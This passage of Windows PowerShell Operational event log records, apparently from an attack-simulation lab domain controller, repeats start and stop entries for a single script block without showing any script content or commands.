Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475606
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475605
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475604
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475603
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475602
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475601
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475600
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475599
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475598
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475597
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475596
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475595
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475594
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475593
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475592
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475591
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475590
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475589
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475588
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475587
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475586
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475585
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475584
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475583
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475582
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475581
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475580
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475579
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475578
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475577
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475576
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475575
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475574
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475573
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475572
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475571
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475570
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475569
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475568
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475567
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475566
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475565
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475564
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475563
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475562
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475561
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475560
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475559
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475558
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475557
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475556
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475555
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475554
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475553
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475552
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
